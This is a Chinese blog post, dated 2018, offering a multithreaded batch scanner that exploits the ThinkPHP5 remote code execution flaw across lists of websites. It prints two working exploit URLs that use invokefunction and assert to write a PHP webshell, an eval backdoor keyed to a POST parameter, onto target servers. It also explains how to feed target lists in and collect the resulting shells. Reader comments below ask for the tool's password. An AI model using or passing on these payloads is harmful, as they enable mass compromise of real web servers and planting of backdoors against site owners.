thinkphp5批量扫描工具
首页 > 工具    作者:Iamyc   2018年12月21日 16:04 星期五   热度:1721°   百度已收录  
时间:2018-12-21 16:04   热度:1721° 

本来12.12就看到了,当时看了全球统计,也就30多万个站

mdzz,觉得没啥好搞的,昨天,骚海找到我,给做批量出来,自己的太慢了,稳定性不好

ok,花了一天时间,写了出来(其中还是一堆的问题,不过还行,能解决)

主要加了多线程、自动检测(poc证明不同版本exp不同,windows和liunux又不同,因此存在一个shell出多个密码覆盖重写的情况)

复现:

工具效果:

shell 

下载地址:下载链接

用法:exe目录有个url.txt即可,自动读取开始扫描,shell生成到shell.txt

然后直接上菜刀

主要exp:

/index.php/?s=index/\think\Container/invokefunction&function=assert&vars[0]=phpinfo().fputs(fopen('saohai.php','w'),'YC<?php @eval($_POST['yc']);?>')

/index.php/?s=index/\think\app/invokefunction&function=assert&vars[0]=phpinfo().fputs(fopen('saohai.php','w'),'YC<?php @eval($_POST['yc']);?>');

具体的其他各大网站自己去整合

有些是:

/index.php?s=

还有些:

/index.php/?s=




二维码加载中...
本文作者:Iamyc      文章标题: thinkphp5批量扫描工具
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=54
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。
阿峰2019-09-03 01:49
密码多少?
淡粉色接口2019-03-25 10:48
请问密码是什么
小伟2019-02-22 13:11
请问执行密码什么啊
Iamyc2019-02-22 18:01
@小伟:已告知
阿峰2019-02-12 06:12
请问密码多少?脚本执行密码
Iamyc2019-02-15 14:10
@阿峰:不要密码的呀

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog